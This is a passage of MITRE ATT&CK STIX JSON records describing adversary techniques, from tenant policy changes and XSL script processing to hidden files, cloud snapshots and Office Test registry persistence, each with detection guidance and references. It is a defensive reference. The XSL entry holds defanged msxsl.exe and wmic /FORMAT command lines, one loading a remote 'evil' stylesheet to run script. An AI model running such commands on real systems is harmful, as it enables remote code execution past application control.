"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1665", "external_id": "T1665"}, {"source_name": "SocGholish-update", "description": "Andrew Northern. (2022, November 22). SocGholish, a very real threat from a very fake update. Retrieved February 13, 2024.", "url": "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update"}, {"source_name": "TA571", "description": "Axel F, Selena Larson. (2023, October 30). TA571 Delivers IcedID Forked Loader. Retrieved February 13, 2024.", "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader"}, {"source_name": "mod_rewrite", "description": "Bluescreenofjeff.com. (2015, April 12). Combatting Incident Responders with Apache mod_rewrite. Retrieved February 13, 2024.", "url": "https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/"}, {"source_name": "Browser-updates", "description": "Dusty Miller. (2023, October 17). Are You Sure Your Browser is Up to Date? The Current Landscape of Fake Browser Updates . Retrieved February 13, 2024.", "url": "https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates"}, {"source_name": "StarBlizzard", "description": "Microsoft Threat Intelligence. (2023, December 7). Star Blizzard increases sophistication and evasion in ongoing attacks. Retrieved February 13, 2024.", "url": "https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/"}, {"source_name": "QR-cofense", "description": "Nathaniel Raymond. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved February 13, 2024.", "url": "https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/"}, {"source_name": "Schema-abuse", "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved February 13, 2024.", "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"}, {"source_name": "Orange Residential Proxies", "description": "Orange Cyberdefense. (2024, March 14). Unveiling the depths of residential proxies providers. Retrieved April 11, 2024.", "url": "https://www.orangecyberdefense.com/global/blog/research/residential-proxies"}, {"source_name": "Facad1ng", "description": "Spyboy. (2023). Facad1ng. Retrieved February 13, 2024.", "url": "https://github.com/spyboy-productions/Facad1ng"}, {"source_name": "sysdig", "description": "Sysdig. (2023). Sysdig Global Cloud Threat Report. Retrieved March 1, 2024.", "url": "https://sysdig.com/content/c/pf-2023-global-cloud-threat-report?x=u_WFRi&xs=524303#page=1"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-19T04:27:31.884Z", "name": "Domain or Tenant Policy Modification", "description": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.\n\nModifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.\n\nWith sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include: \n\n* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)\n* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)\n\nAdversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Obsidian Security"], "x_mitre_deprecated": false, "x_mitre_detection": "It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nConsider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "SaaS"], "x_mitre_version": "3.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["System access controls", "File system access controls"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "created": "2019-03-07T14:10:32.650Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1484", "external_id": "T1484"}, {"source_name": "CISA SolarWinds Cloud Detection", "description": "CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.", "url": "https://us-cert.cisa.gov/ncas/alerts/aa21-008a"}, {"source_name": "ADSecurity GPO Persistence 2016", "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", "url": "https://adsecurity.org/?p=2716"}, {"source_name": "Microsoft 365 Defender Solorigate", "description": "Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.", "url": "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/"}, {"source_name": "Microsoft - Azure Sentinel ADFSDomainTrustMods", "description": "Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.", "url": "https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml"}, {"source_name": "Microsoft - Update or Repair Federated domain", "description": "Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.", "url": "https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365"}, {"source_name": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks", "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.", "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"}, {"source_name": "Okta Cross-Tenant Impersonation 2023", "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.", "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"}, {"source_name": "Wald0 Guide to GPOs", "description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019.", "url": "https://wald0.com/?p=179"}, {"source_name": "Harmj0y Abusing GPO Permissions", "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.", "url": "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/"}, {"source_name": "Sygnia Golden SAML", "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", "url": "https://www.sygnia.co/golden-saml-advisory"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "XSL Script Processing", "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Avneet Singh", "Casey Smith", "Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Digital Certificate Validation", "Application Control"], "x_mitre_system_requirements": ["Microsoft Core XML Services (MSXML) or access to wmic.exe"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", "created": "2018-10-17T00:14:20.652Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1220", "external_id": "T1220"}, {"source_name": "Reaqta MSXSL Spearphishing MAR 2018", "description": "Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.", "url": "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/"}, {"source_name": "Twitter SquiblyTwo Detection APR 2018", "description": "Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.", "url": "https://twitter.com/dez_/status/986614411711442944"}, {"source_name": "LOLBAS Wmic", "description": "LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Wmic/"}, {"source_name": "Microsoft msxsl.exe", "description": "Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.", "url": "https://www.microsoft.com/download/details.aspx?id=21714"}, {"source_name": "Penetration Testing Lab MSXSL July 2017", "description": "netbiosX. (2017, July 6). AppLocker Bypass \u2013 MSXSL. Retrieved July 3, 2018.", "url": "https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/"}, {"source_name": "XSL Bypass Mar 2019", "description": "Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE \u2014 A Way to Proxy Code Execution. Retrieved August 2, 2019.", "url": "https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75"}, {"source_name": "Microsoft XSLT Script Mar 2017", "description": "Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.", "url": "https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Scan Databases", "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", "created": "2020-10-02T17:00:44.586Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1596/005", "external_id": "T1596.005"}, {"source_name": "Shodan", "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020.", "url": "https://shodan.io"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Hidden Files and Directories", "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "created": "2020-02-26T17:46:13.128Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/001", "external_id": "T1564.001"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}, {"source_name": "WireLurker", "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Create Snapshot", "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", "created": "2020-06-09T15:33:13.563Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1578/001", "external_id": "T1578.001"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}, {"source_name": "AWS Cloud Trail Backup API", "description": "Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.", "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html"}, {"source_name": "Azure - Monitor Logs", "description": "Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.", "url": "https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor"}, {"source_name": "Cloud Audit Logs", "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", "url": "https://cloud.google.com/logging/docs/audit#admin-activity"}, {"source_name": "GCP - Creating and Starting a VM", "description": "Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.", "url": "https://cloud.google.com/compute/docs/instances/create-start-instance#api_2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Determine Physical Locations", "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", "created": "2020-10-02T16:32:33.126Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1591/001", "external_id": "T1591.001"}, {"source_name": "ThreatPost Broadvoice Leak", "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"}, {"source_name": "SEC EDGAR Search", "description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.", "url": "https://www.sec.gov/edgar/search-and-access"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-16T12:41:55.175Z", "name": "Office Test", "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature, such as:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "created": "2019-11-07T19:44:04.475Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137/002", "external_id": "T1137.002"}, {"source_name": "Palo Alto Office Test Sofacy", "description": "Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/"}, {"source_name": "Hexacorn Office Test", "description": "Hexacorn. (2014, April 16). Beyond good ol\u2019 Run key, Part 10. Retrieved July 3, 2017.", "url": "http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Develop Capabilities", "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nConsider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", "created": "2020-10-01T01:30:00.877Z", "created_by_ref": 